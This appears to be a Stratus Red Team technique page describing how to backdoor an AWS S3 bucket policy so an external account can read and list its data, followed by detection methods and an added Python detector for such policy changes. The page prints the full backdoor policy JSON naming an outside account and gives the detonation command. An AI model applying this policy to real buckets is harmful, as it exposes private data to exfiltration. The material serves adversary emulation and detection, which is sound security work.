Backdoor an S3 Bucket via its Bucket Policy

idempotent

Platform: AWS

MITRE ATT&CK Tactics

  • Exfiltration

Description

Exfiltrates data from an S3 bucket by backdooring its Bucket Policy to allow access from an external, fictitious AWS account.

Warm-up:

  • Create an S3 bucket.

Detonation:

  • Backdoor the S3 Bucket Policy by setting the following Bucket Policy (the %s placeholders are filled in with the bucket name):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::193672423079:root"
      },
      "Action": [
        "s3:GetObject",
        "s3:GetBucketLocation",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::%s/*",
        "arn:aws:s3:::%s"
      ]
    }
  ]
}
```

Instructions

Detonate with Stratus Red Team:

```bash
stratus detonate aws.exfiltration.s3-backdoor-bucket-policy
```

Detection

  • Using CloudTrail's PutBucketPolicy event.

  • Through GuardDuty's Policy:S3/BucketAnonymousAccessGranted finding, if the S3 bucket was made public (and not only shared with an attacker-controlled AWS account).

  • Through IAM Access Analyzer, which generates a finding when an S3 bucket is made public or accessible from another account.
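As an added example (not part of the Stratus Red Team documentation), a small detector for the CloudTrail-based detection listed above: it reviews a PutBucketPolicy record and flags any Allow statement whose principal is a wildcard or an AWS account outside a trusted list. The trusted-account list, the bucket name and the event shape are constructed for the example; it assumes requestParameters.bucketPolicy carries the policy document as CloudTrail records it.

```python
import json
import re

# Trusted account IDs (constructed for the example; normally from the org inventory).
TRUSTED_ACCOUNTS = {"111111111111"}
ARN_ACCOUNT_RE = re.compile(r"^arn:aws:iam::(\d{12}):")

def classify_principals(principal):
    """Yield ("public", None), ("account", id) or ("unknown", raw) for each AWS principal."""
    aws = principal.get("AWS", []) if isinstance(principal, dict) else principal
    for p in ([aws] if isinstance(aws, str) else aws):
        if p == "*":
            yield "public", None              # anonymous access, the GuardDuty case
        elif re.fullmatch(r"\d{12}", p):
            yield "account", p                # bare account ID
        elif (m := ARN_ACCOUNT_RE.match(p)):
            yield "account", m.group(1)       # arn:aws:iam::<account>:root / :user/... / :role/...
        else:
            yield "unknown", p                # service, federated or malformed principal: review by hand

def review_put_bucket_policy(event, trusted=TRUSTED_ACCOUNTS):
    """Findings (kind, bucket, detail) for one CloudTrail PutBucketPolicy record.
    Assumes requestParameters.bucketPolicy holds the policy document (dict or JSON string)."""
    if event.get("eventName") != "PutBucketPolicy":
        return []
    params = event.get("requestParameters") or {}
    policy = params.get("bucketPolicy") or {}
    if isinstance(policy, str):
        policy = json.loads(policy)
    bucket = params.get("bucketName", "?")
    stmts = policy.get("Statement", [])
    findings = []
    for stmt in ([stmts] if isinstance(stmts, dict) else stmts):
        if stmt.get("Effect") != "Allow":
            continue
        for kind, value in classify_principals(stmt.get("Principal", {})):
            if kind == "public":
                findings.append(("public-access", bucket, None))
            elif kind == "account" and value not in trusted:
                findings.append(("cross-account", bucket, value))
            elif kind == "unknown":
                findings.append(("unparsed-principal", bucket, value))
    return findings

# Constructed CloudTrail record carrying the policy this technique applies.
SAMPLE_EVENT = {"eventName": "PutBucketPolicy", "requestParameters": {
    "bucketName": "demo-bucket", "bucketPolicy": {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::193672423079:root"},
        "Action": ["s3:GetObject", "s3:GetBucketLocation", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::demo-bucket/*", "arn:aws:s3:::demo-bucket"]}]}}}
```

Running review_put_bucket_policy(SAMPLE_EVENT) yields one cross-account finding for 193672423079; a policy granting only trusted accounts yields none, and a "*" principal yields a public-access finding.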